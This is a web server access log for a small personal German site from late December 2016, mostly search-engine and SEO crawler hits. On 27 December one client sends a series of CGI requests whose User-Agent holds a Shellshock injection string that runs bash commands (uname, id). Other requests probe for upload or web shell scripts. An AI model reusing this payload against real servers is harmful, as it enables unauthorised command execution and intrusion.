138.201.30.66 - - [17/Dec/2016:12:41:28 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.30.66 - - [17/Dec/2016:12:41:31 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
46.229.164.100 - - [17/Dec/2016:20:42:54 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
62.235.131.87 - - [17/Dec/2016:22:17:10 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
62.235.131.87 - - [17/Dec/2016:22:17:10 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
149.91.123.191 - - [18/Dec/2016:20:05:55 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.7.0_79"
149.91.123.191 - - [18/Dec/2016:20:05:56 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.7.0_79"
46.229.164.100 - - [18/Dec/2016:21:51:46 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
138.201.59.34 - - [19/Dec/2016:02:37:03 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.59.34 - - [19/Dec/2016:02:37:04 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
87.210.17.86 - - [19/Dec/2016:07:39:29 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.6.0_04"
87.210.17.86 - - [19/Dec/2016:07:39:29 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.6.0_04"
46.229.164.100 - - [19/Dec/2016:22:26:30 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
93.224.93.100 - - [20/Dec/2016:17:25:18 +0100] "GET / HTTP/1.1" 200 569 "http://www.bigfinder.de/?c=ws&q=home&v=1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
46.229.164.99 - - [21/Dec/2016:09:21:56 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
138.201.59.34 - - [22/Dec/2016:04:26:12 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.59.34 - - [22/Dec/2016:04:26:13 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
208.43.225.85 - - [22/Dec/2016:06:53:10 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)"
208.43.225.85 - - [22/Dec/2016:06:53:12 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)"
5.255.251.2 - - [22/Dec/2016:10:44:59 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
46.229.164.99 - - [22/Dec/2016:11:58:55 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.191.64 - - [23/Dec/2016:08:46:27 +0100] "GET /upload.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
64.246.165.160 - - [23/Dec/2016:09:29:34 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.160 - - [23/Dec/2016:09:29:34 +0100] "GET / HTTP/1.1" 200 569 "http://whois.domaintools.com/die-fabians.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
46.229.164.99 - - [23/Dec/2016:13:42:35 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
194.118.102.27 - - [23/Dec/2016:18:57:44 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.118.102.27 - - [23/Dec/2016:18:57:44 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "http://www.die-fabians.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.118.102.27 - - [23/Dec/2016:18:57:46 +0100] "GET /favicon.ico HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.118.102.27 - - [23/Dec/2016:18:57:46 +0100] "GET /favicon.ico HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.252.149.16 - - [24/Dec/2016:00:55:14 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; OrangeBot/2.0; support.orangebot@orange.com)"
193.252.149.16 - - [24/Dec/2016:00:55:17 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; OrangeBot/2.0; support.orangebot@orange.com)"
151.80.31.183 - - [24/Dec/2016:02:33:00 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)"
163.172.66.57 - - [24/Dec/2016:02:33:00 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)"
138.201.59.34 - - [24/Dec/2016:08:57:31 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.59.34 - - [24/Dec/2016:08:57:34 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
5.10.148.125 - - [24/Dec/2016:11:11:36 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
5.10.148.125 - - [24/Dec/2016:11:11:40 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
79.116.29.43 - - [24/Dec/2016:11:13:02 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.6.0_04"
79.116.29.43 - - [24/Dec/2016:11:13:02 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.6.0_04"
46.229.164.99 - - [24/Dec/2016:15:02:13 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
159.203.96.8 - - [24/Dec/2016:18:57:02 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
159.203.96.8 - - [24/Dec/2016:18:57:08 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
158.69.225.35 - - [25/Dec/2016:00:25:42 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.225.35 - - [25/Dec/2016:00:25:46 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.225.35 - - [25/Dec/2016:00:25:46 +0100] "GET /sitemap.xml HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.225.35 - - [25/Dec/2016:00:25:47 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
158.69.225.35 - - [25/Dec/2016:00:25:48 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
37.48.119.133 - - [25/Dec/2016:06:34:01 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.4.1_04"
37.48.119.133 - - [25/Dec/2016:06:34:01 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.4.1_04"
46.229.164.99 - - [25/Dec/2016:16:10:41 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.194.192 - - [25/Dec/2016:23:58:35 +0100] "GET /update.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.154.194.192 - - [25/Dec/2016:23:58:35 +0100] "GET /update.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.249.66.43 - - [26/Dec/2016:02:42:16 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.93 - - [26/Dec/2016:02:42:16 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.255.215.83 - - [26/Dec/2016:09:31:39 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.83 - - [26/Dec/2016:09:31:39 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
77.75.78.170 - - [26/Dec/2016:19:11:33 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.78.170 - - [26/Dec/2016:19:11:33 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.95 - - [26/Dec/2016:22:24:33 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.95 - - [26/Dec/2016:22:24:34 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
46.229.164.99 - - [27/Dec/2016:02:32:37 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
77.75.79.72 - - [27/Dec/2016:04:37:45 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.72 - - [27/Dec/2016:04:37:46 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
37.59.169.249 - - [27/Dec/2016:09:09:43 +0100] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:09:48 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:09:53 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:09:58 +0100] "GET /cgi-mod/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:03 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:08 +0100] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:13 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:18 +0100] "GET / HTTP/1.1" 200 569 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:23 +0100] "GET /cgi-bin/php HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:29 +0100] "GET /cgi-bin/php4 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:34 +0100] "GET /cgi-bin/php5 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:39 +0100] "GET /cgi-bin/ HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:44 +0100] "GET /cgi-bin/php-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
37.59.169.249 - - [27/Dec/2016:09:10:49 +0100] "GET /sys-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
77.75.77.11 - - [27/Dec/2016:10:15:47 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.77.11 - - [27/Dec/2016:10:15:47 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
207.241.231.247 - - [27/Dec/2016:12:06:06 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot)"
84.200.56.122 - - [27/Dec/2016:15:40:18 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/5.1)"
84.200.56.122 - - [27/Dec/2016:15:40:18 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "http://www.die-fabians.de/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/5.1)"
66.249.76.91 - - [27/Dec/2016:23:54:21 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.46 - - [27/Dec/2016:23:54:21 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.185.237.185 - - [28/Dec/2016:05:48:32 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.7.0_79"
81.185.237.185 - - [28/Dec/2016:05:48:32 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.7.0_79"
96.56.24.130 - - [28/Dec/2016:06:28:36 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.6.0_04"
96.56.24.130 - - [28/Dec/2016:06:28:36 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.6.0_04"
46.229.164.99 - - [28/Dec/2016:06:46:09 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
138.201.30.66 - - [28/Dec/2016:06:52:14 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.30.66 - - [28/Dec/2016:06:52:16 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
83.236.131.219 - - [28/Dec/2016:15:46:30 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
83.236.131.219 - - [28/Dec/2016:15:46:30 +0100] "GET / HTTP/1.1" 200 569 "-" "Ruby"
66.249.73.237 - - [28/Dec/2016:21:59:10 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.231 - - [28/Dec/2016:21:59:11 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.75.76.161 - - [29/Dec/2016:03:40:00 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.76.161 - - [29/Dec/2016:03:40:01 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
37.48.119.133 - - [29/Dec/2016:08:07:48 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.4.1_04"
37.48.119.133 - - [29/Dec/2016:08:07:48 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.4.1_04"
46.229.164.99 - - [29/Dec/2016:12:23:12 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.194.192 - - [29/Dec/2016:17:23:04 +0100] "GET /udd.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
138.201.59.34 - - [30/Dec/2016:00:10:08 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.59.34 - - [30/Dec/2016:00:10:09 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
136.243.36.100 - - [30/Dec/2016:05:14:30 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
77.0.81.177 - - [30/Dec/2016:14:12:58 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
46.229.164.99 - - [30/Dec/2016:18:36:42 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
46.229.168.67 - - [30/Dec/2016:18:36:52 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.181.162 - - [31/Dec/2016:06:08:43 +0100] "GET /udd.php HTTP/1.1" 404 1256 "http://www.die-fabians.de/udd.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
5.10.148.125 - - [31/Dec/2016:06:57:40 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
5.10.148.125 - - [31/Dec/2016:06:57:44 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
46.229.164.99 - - [31/Dec/2016:22:11:12 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
138.68.65.222 - - [31/Dec/2016:22:40:16 +0100] "HEAD / HTTP/1.1" 200 - "http://www.die-fabians.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
138.68.65.222 - - [31/Dec/2016:22:40:16 +0100] "GET / HTTP/1.1" 200 569 "http://www.die-fabians.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"